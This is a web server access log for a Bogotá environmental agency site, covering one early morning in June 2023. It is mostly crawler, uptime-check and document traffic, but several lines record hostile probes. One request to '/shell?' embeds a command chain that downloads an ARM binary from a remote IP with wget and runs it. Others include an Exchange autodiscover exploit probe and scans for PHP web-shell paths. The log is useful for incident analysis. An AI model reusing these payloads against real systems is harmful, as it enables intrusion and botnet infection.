172.22.2.4 - - [05/Jun/2023:02:29:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
69.63.184.3 - - [05/Jun/2023:02:32:39 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
216.245.221.92 - - [05/Jun/2023:02:32:55 -0500] "HEAD / HTTP/1.1" 200 -
31.13.127.4 - - [05/Jun/2023:02:33:01 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
157.55.39.239 - - [05/Jun/2023:02:33:44 -0500] "GET /BLA/resoluciones/AUTOS%202022/2068.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:02:34:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:35:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58307
216.245.221.92 - - [05/Jun/2023:02:37:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:40:40 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
172.22.2.4 - - [05/Jun/2023:02:41:04 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [05/Jun/2023:02:40:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jun/2023:02:42:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:41:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52730
162.142.125.223 - - [05/Jun/2023:02:47:10 -0500] "GET / HTTP/1.1" 200 319
162.142.125.223 - - [05/Jun/2023:02:47:11 -0500] "PRI * HTTP/2.0" 400 946
162.142.125.223 - - [05/Jun/2023:02:47:11 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [05/Jun/2023:02:47:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:46:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:47:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
216.245.221.92 - - [05/Jun/2023:02:52:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:52:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:53:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
216.245.221.92 - - [05/Jun/2023:02:57:55 -0500] "HEAD / HTTP/1.1" 200 -
200.118.60.119 - - [05/Jun/2023:02:58:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 582538
172.22.2.4 - - [05/Jun/2023:02:58:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:59:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55221
216.245.221.92 - - [05/Jun/2023:03:02:55 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.205 - - [05/Jun/2023:03:03:42 -0500] "GET /usaquen-comprometida-con-la-accion-climatica-en-bogota.html HTTP/1.1" 200 771
66.249.70.168 - - [05/Jun/2023:03:04:10 -0500] "GET /usaquen-comprometida-con-la-accion-climatica-en-bogota.html HTTP/1.1" 200 771
172.22.2.4 - - [05/Jun/2023:03:04:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:04:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53924
172.22.2.4 - - [05/Jun/2023:03:07:07 -0500] "GET /BLA/boletinlegal/download/po HTTP/1.1" 404 1018
172.22.2.4 - - [05/Jun/2023:03:07:07 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
216.245.221.92 - - [05/Jun/2023:03:07:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:09:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:10:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [05/Jun/2023:03:12:55 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.158 - - [05/Jun/2023:03:16:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2802.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:03:15:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jun/2023:03:17:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:16:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
157.55.39.239 - - [05/Jun/2023:03:18:39 -0500] "GET /BLA/resoluciones/AUTOS%202022/1028.pdf HTTP/1.1" 200 390070
216.245.221.92 - - [05/Jun/2023:03:22:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:21:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:22:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
162.55.175.144 - - [05/Jun/2023:03:27:18 -0500] "GET / HTTP/1.1" 200 4720
162.55.175.144 - - [05/Jun/2023:03:27:33 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Jun/2023:03:27:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:27:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:28:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55934
172.22.2.4 - - [05/Jun/2023:03:31:40 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
34.31.119.249 - - [05/Jun/2023:03:32:13 -0500] "\x16\x03\x01" 400 226
34.31.119.249 - - [05/Jun/2023:03:32:15 -0500] "OPTIONS / HTTP/1.0" 200 -
216.245.221.92 - - [05/Jun/2023:03:32:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:31:41 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 60094
31.13.127.28 - - [05/Jun/2023:03:34:04 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 206 856
31.13.127.24 - - [05/Jun/2023:03:34:05 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
31.13.127.12 - - [05/Jun/2023:03:34:07 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 206 856
172.22.2.4 - - [05/Jun/2023:03:33:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:34:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [05/Jun/2023:03:37:55 -0500] "HEAD / HTTP/1.1" 200 -
173.252.127.18 - - [05/Jun/2023:03:38:07 -0500] "GET /manos-reparadoras-protagonistas-en-la-segunda-feria-de-moda-sostenible.html HTTP/1.1" 206 774
172.22.2.4 - - [05/Jun/2023:03:39:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:39:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [05/Jun/2023:03:42:55 -0500] "HEAD / HTTP/1.1" 200 -
186.155.75.76 - - [05/Jun/2023:03:43:13 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
172.22.2.4 - - [05/Jun/2023:03:44:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:45:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
216.245.221.92 - - [05/Jun/2023:03:47:55 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.6 - - [05/Jun/2023:03:48:54 -0500] "GET /15-negocios-verdes-verificados-por-la-secretaria-de-ambiente-participan-en-la-feria-hecho-en-bogota.html HTTP/1.1" 200 1007
69.171.249.12 - - [05/Jun/2023:03:48:54 -0500] "GET /15-negocios-verdes-verificados-por-la-secretaria-de-ambiente-participan-en-la-feria-hecho-en-bogota.html HTTP/1.1" 200 1007
172.22.2.4 - - [05/Jun/2023:03:50:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jun/2023:03:52:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:51:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
157.55.39.239 - - [05/Jun/2023:03:54:54 -0500] "GET /Autoliquidacion/index.php?dir=Grupo+Forestal+-+Industria+de+la+Madera%2F HTTP/1.1" 200 5307
52.167.144.46 - - [05/Jun/2023:03:55:55 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 503 1037
216.245.221.92 - - [05/Jun/2023:03:57:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:56:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:03:57:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [05/Jun/2023:04:02:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:02:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:03:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
157.55.39.239 - - [05/Jun/2023:04:07:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4685.pdf HTTP/1.1" 304 -
52.167.144.25 - - [05/Jun/2023:04:07:17 -0500] "GET /BLA/resoluciones/AUTOS%202022/1516.pdf HTTP/1.1" 304 -
52.167.144.25 - - [05/Jun/2023:04:07:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/4221.pdf HTTP/1.1" 304 -
52.167.144.25 - - [05/Jun/2023:04:07:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2842.pdf HTTP/1.1" 304 -
216.245.221.92 - - [05/Jun/2023:04:07:55 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.239 - - [05/Jun/2023:04:08:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/1387.pdf HTTP/1.1" 200 420027
43.153.115.234 - - [05/Jun/2023:04:08:58 -0500] "GET /galeria/galeria/fotos/diaSC6Peq.jpg HTTP/1.1" 200 17665
109.205.213.107 - - [05/Jun/2023:04:09:27 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.213.7/bins/UnHAnaAW.arm;chmod+777+/tmp/UnHAnaAW.arm;sh+/tmp/UnHAnaAW.arm HTTP/1.1" 404 1013
172.22.2.4 - - [05/Jun/2023:04:08:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:09:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [05/Jun/2023:04:12:55 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.7 - - [05/Jun/2023:04:13:48 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
172.22.2.4 - - [05/Jun/2023:04:14:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:14:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58663
216.245.221.92 - - [05/Jun/2023:04:17:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:19:18 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 1018
40.77.167.205 - - [05/Jun/2023:04:20:58 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 503 1037
172.22.2.4 - - [05/Jun/2023:04:19:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:20:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51032
172.22.2.4 - - [05/Jun/2023:04:20:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
216.245.221.92 - - [05/Jun/2023:04:22:55 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.97 - - [05/Jun/2023:04:24:38 -0500] "GET /POT-2013/Cartografia/22_Sistema%20de%20Gas%20Natural_FEB.pdf HTTP/1.1" 304 -
157.55.39.239 - - [05/Jun/2023:04:26:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/1530.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:04:25:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jun/2023:04:27:55 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.97 - - [05/Jun/2023:04:27:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0652.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:04:26:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
52.167.144.158 - - [05/Jun/2023:04:29:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/1097.pdf HTTP/1.1" 304 -
123.183.224.98 - - [05/Jun/2023:04:30:17 -0500] "GET / HTTP/1.1" 200 319
51.222.44.188 - - [05/Jun/2023:04:31:45 -0500] "GET /inputs.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:31:45 -0500] "GET /auto_seo.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:31:45 -0500] "GET /wp-content/inputs.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:31:45 -0500] "GET /wp-admin/inputs.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:31:46 -0500] "GET /wp-includes/inputs.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:31:50 -0500] "GET /inputs.php HTTP/1.1" 404 1032
51.222.44.188 - - [05/Jun/2023:04:31:51 -0500] "GET /auto_seo.php HTTP/1.1" 404 1032
51.222.44.188 - - [05/Jun/2023:04:31:51 -0500] "GET /wp-content/inputs.php HTTP/1.1" 404 1032
51.222.44.188 - - [05/Jun/2023:04:31:51 -0500] "GET /wp-admin/inputs.php HTTP/1.1" 404 1032
51.222.44.188 - - [05/Jun/2023:04:31:51 -0500] "GET /wp-includes/inputs.php HTTP/1.1" 404 1032
216.245.221.92 - - [05/Jun/2023:04:32:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:31:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.97 - - [05/Jun/2023:04:33:56 -0500] "GET /BLA/resoluciones/AUTOS%202014/0501.pdf HTTP/1.1" 200 588991
172.22.2.4 - - [05/Jun/2023:04:32:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
172.22.2.4 - - [05/Jun/2023:04:35:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
69.63.184.1 - - [05/Jun/2023:04:36:24 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
52.167.144.158 - - [05/Jun/2023:04:37:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3384.pdf HTTP/1.1" 304 -
216.245.221.92 - - [05/Jun/2023:04:37:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:37:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:38:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
79.110.72.16 - - [05/Jun/2023:04:40:15 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%204101%20al%204200/RESOLUCION%204179%20DE%202007.pdf HTTP/1.1" 200 1763306
133.41.47.164 - - [05/Jun/2023:04:41:23 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
40.77.167.205 - - [05/Jun/2023:04:41:33 -0500] "GET /portaldeninos/para-mejorar-mi-ambiente/ HTTP/1.1" 503 1037
65.154.226.168 - - [05/Jun/2023:04:41:37 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
216.245.221.92 - - [05/Jun/2023:04:42:55 -0500] "HEAD / HTTP/1.1" 200 -
69.171.251.2 - - [05/Jun/2023:04:44:00 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
40.77.167.97 - - [05/Jun/2023:04:44:50 -0500] "GET /BLA/resoluciones/AUTOS%202022/1420.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:04:43:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
51.222.44.188 - - [05/Jun/2023:04:44:56 -0500] "GET /inputs.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:44:57 -0500] "GET /auto_seo.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:44:57 -0500] "GET /wp-content/inputs.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:44:57 -0500] "GET /wp-admin/inputs.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:44:57 -0500] "GET /wp-includes/inputs.php HTTP/1.1" 404 1035
51.222.44.188 - - [05/Jun/2023:04:45:01 -0500] "GET /inputs.php HTTP/1.1" 404 1032
51.222.44.188 - - [05/Jun/2023:04:45:01 -0500] "GET /auto_seo.php HTTP/1.1" 404 1032
51.222.44.188 - - [05/Jun/2023:04:45:01 -0500] "GET /wp-content/inputs.php HTTP/1.1" 404 1032
51.222.44.188 - - [05/Jun/2023:04:45:01 -0500] "GET /wp-admin/inputs.php HTTP/1.1" 404 1032
51.222.44.188 - - [05/Jun/2023:04:45:02 -0500] "GET /wp-includes/inputs.php HTTP/1.1" 404 1032
172.22.2.4 - - [05/Jun/2023:04:44:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58307
216.245.221.92 - - [05/Jun/2023:04:47:55 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.239 - - [05/Jun/2023:04:48:39 -0500] "GET /BLA/resoluciones/AUTOS%202018/6811.pdf HTTP/1.1" 200 298866
186.102.57.72 - - [05/Jun/2023:04:49:51 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/vUmjxJ87RUM0ud8lS6FfQecO2hJ0qo0thNpOgydm4y+iGY2X9gyM3&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 30
186.102.57.72 - - [05/Jun/2023:04:49:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/CvhiQUsRvlJvX3jZ3XXi7eFu3IJhzN5UEU4i1ShWYLG8/fizpOOPwwvBjXjzIhyYOqCYkJ+f7ZovmVvdH97+238n8nHGkDDg=&u=U2FsdGVkX1/kFZTqjZk55cr3//rU9i0PLIMp+4V9uq5uYiwnsEH62LlWM2d/z6zQ&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 97
186.102.57.72 - - [05/Jun/2023:04:49:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/tqcczmd+BPdPYc1U4G/ew9YWeLChzm2kEulSFPhtFWxctuiCez49ZuoFL0UR+qGhkFlfZ+y6dp83Ijei42NosjlFUoQJKj7by0VV+3Sff8nS9UfVDTjIlfRVbhKabwPZJDg9CKxTz0G+P9xVfKmnVJY3D1v5oThFoJM8a4C7p4b6NofStMYnB4vrFUGUcEnwV966sQd0gmtvB58zXx0xQnlYLBpXUMQMWVsPveqXXh8DRq+yBkmZh4mved0iRF9SsITMSkxeRa/5uyR9yCdeOh8xZfX94+PW3NlXZWXj7IFwl0qCZzsVsMe1ddV+8OSol+zRKQiAAjGhJGWwWjRezFkZkz7cbHx8AyKElHn8qBNd+y7qt+xapZZfKVmnFhCfpR540fX+N8RSHCG+Z/rCNp+wnnCNsHY61/wNWE2UbxDN/QvQD4TQaknoifQFgAEPn5Z8mOarr8hPJ98YT7YbBWoZHKt/mxqdWk0xa4pj0vKLqOxr2O0nIM1ijel5Nn68hVneo/2/BqMgaRWlYJLliqZ6tz5vlEYFo7zonvoxYbzPdiSngymu8RqZPUzjLZ055D1OTEObKPPCdKZUmL/7M28UlSeVERjDtMpq0OIugdQeVaWrKeHeeF05uHCKJ4hqMgvodj7S+G0AQvMZvD6cBsRmMpA13zzlCUXj4bgW6Go+XWjZ7RbjkvOehzhbMwuG3YlgyLvwZrkd9Y3CyJ6h6FWOOratUq5pygD2Z6tNzhNYCFnEq7MxG1P+1TmGH2mK0IRTWqRpuwZsoYfmkUad1BkGhZIrlCDAlr52tvKR18eyRXHEZO8KJ7qvUVRozwal6pBZ1tB0u8hUFvrJPJX3iy44/rDU9IMgnS6/MVFB26P6nyuaP/j6iJ/cEe5p4/7Up2Z2iuXi0VIuDx3uLL12tzE6TPSPQFvltAKNYVk2pGOaa5XRz/3jL8l0YA6wE4hSeEBEFTgKe+oHW4EuoDv9/dIGBDbol0YzNraMNhZmv0ZJ9HwMyKLEtYR9cwaFOHy/jFL+IjLErVjaePe2x+mufSHpzimeC42RN887DiitWFH9LK2za0VAzWFfqm8NwWDpiehmFhBfVgwOpWoE3Re3+eJKE6BCcYP590JuT83vUPnjef34Bz1BfF7E58LyRCmDXZjd6ql1SSQtbS/eW7I3FJR1tX/rYTfK5nBvxg7Z7BpmtF+NaUxnMd4mZTv/ZS29ZNnWecP3pdXBhCT4GtAEll63OeiU1nvObRBz/qL7TDATPjbtz/SZMnI0gNrLdmQQqYFzIAD56WmlqCaXZ3p5b2Pco3DSEyRrAkEr5sC4hjlhcNxA4LxMA7tdGZKrRh19pdB7s+pBEgMQwz1/mEqQ5dgWCLNlsCts2liepDwRUBFEwEdVeyP7mgxmUCzlT9rF3IRi29bQRjuNHfBEb7Ku+M1NfZOQPB7E=&u=U2FsdGVkX1/kFZTqjZk55cr3//rU9i0PLIMp+4V9uq5uYiwnsEH62LlWM2d/z6zQ&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 2256
186.102.57.72 - - [05/Jun/2023:04:49:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/cUh5Xu3j7PKcsSBJNKz+yER6+GwvqkGIQu5PfnEJHTmrPeSRBcesuIOOMU7JhKqb0FKFeTC21GfBvpqaLHrS8pcShfn7aR2k9UNDmChqcrJZYquoBd3xv/uejDcw0JpfoUGz9bG22kXAFxEnB673ugIUirhKkDHO2VEElhnNKfiEq3bHjR6EeXaWhH1aWxeGGtXdsXM2ujcTf61FBw98gW/Qai0Wj+4aSBLB0udaID27NReU+J58nvhZStJ297koUyEvmAzwV4XdG3vHPWH8/OnxSiC/ZsSOK9Kap5724CBj6K5UUv7JUf3z2W8ITvWXpW20Dq3OkjREiv148s+YVn7k4we3iJ8Y=&u=U2FsdGVkX1/kFZTqjZk55cr3//rU9i0PLIMp+4V9uq5uYiwnsEH62LlWM2d/z6zQ&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 196
186.102.57.72 - - [05/Jun/2023:04:49:52 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/vUmjxJ87RUM0ud8lS6FfQecO2hJ0qo0thNpOgydm4y+iGY2X9gyM3 HTTP/1.1" 200 31032
172.22.2.4 - - [05/Jun/2023:04:49:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:49:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
216.245.221.92 - - [05/Jun/2023:04:52:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:04:54:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.184.5 - - [05/Jun/2023:04:56:34 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
172.22.2.4 - - [05/Jun/2023:04:55:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [05/Jun/2023:04:57:55 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.239 - - [05/Jun/2023:05:00:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1248.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:05:00:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jun/2023:05:02:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:05:01:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52730
216.245.221.92 - - [05/Jun/2023:05:07:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:05:06:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:05:07:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
186.102.57.72 - - [05/Jun/2023:05:10:42 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/Vr2XPKBeYkGXY2Is58iGXoORMRKZpeSYRUTven8V2cbhgatif5yWRo31+jVArhhXsmSoVi97Dz+rQTtPdw/bYimE0ZeS/O0PjAczJeMzmD3ImIfviT3w/QLDF41IDeaWwMkw1DfW6hU1UttiIv5zvnMWXFfnrzPygCFdUoTdlhOFGMo1OoIu/oPdUjLPGf7H2uXqgcB3DFq3Uus8h8TjMnkILcD1HBp7/eMLWW3XHMijhsAAbv2aCaB/A6iGCN1ax4lyi7i1fDA==&u=U2FsdGVkX1/kFZTqjZk55cr3//rU9i0PLIMp+4V9uq5uYiwnsEH62LlWM2d/z6zQ&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 26
186.102.57.72 - - [05/Jun/2023:05:10:43 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19WbKqSfZqMhMqqTqsUs2QHW8zDEluKF3JE8qMF++zIl7RhtBxa4N0o616yrdvgZmRTSVtOrCpINJsZYmnC+4F45+FsDwriGUWCfyu9Yz0sQTifLiUJnppsf0euLIJiAN981ENc9stJo9laAi2pgavDKnKzAtYc9EOt6Q4JCPYvr20Q4nE+i71MgauI8lYQ9RO+rNvGfuNcf7/6gdHG/iKm3oEcd+JChC9uuPEs4PHSIrTaCrC2i7b/GoPAQ1TAG/VnPUNrsjuaGYZS6D8N+BcE91tHWDWYgKX3zVPBpXiT3J6RFE3NKKRMmQiuSPR5VVkmOTla8qLrq90MEy3u9DLhQYhtKi8L3oV1OjxY5v4Kvg5Dpb5RlEk2aioUY1ASk1Djq4VyfnjJXztiLy69Tik15oCEuK9mB3h8OCjbxiSUr5bkEMM/5aLcHU45cLo397Udw3RYAQErseYNTYiCd3r0oBnygW9cc8edU6aSnJMfu1lVpthCAc/bC4PwNPI2B+UPvzhHlruI5tOvHlOgF+VDVqrh3sdCB/V+ZA81BGYGDwI5wo2fg0/QTrNqPbOrxRda4jnsOqL8xZMSrv7bm4yUwOJM6m9/kzMS7JfhJNnqR1gJvVdXyC3NOy9lkGisogYrRybiLqFHAVP2eaV5wD+e1+cGatLeNxN2MPfXYM08qrw1pZbD3fmzqUJnjfCN/j99OfAWCRmGyQc9iqvlP3245cUYJQAzc5ZikD5HX07Z61TCfuJT33TIazk6FWaNVvBJZHYugiorMht/LfYz2ym2zIdRLLUgBzq3VlNi0afRhTa8zABx4eSJ5YlR/sRD6fjcngxBGkmS6ixsD4lGQtHo9aQtufn5vB+8U8+vmTBgCsw1rOC3OKMmueybM6WecGz4gGPcmpco9NfHbPgnqUlFXqNXwjBvsEihFZmFxCcEMjr2YWH6NUB5szsmStk3Id9kSnm5p+uk1pV2K8eAIUCgCs8FSLap21CQlhTCvnQ8dOQexP/LXpnfD7a/tI71OHX6JNtQUh2hrLVc6F1AVEPN/K4ph7dRDXqaj+9G2yl7GTxG8AB6TgxYqwi7QwPzxKl9YJ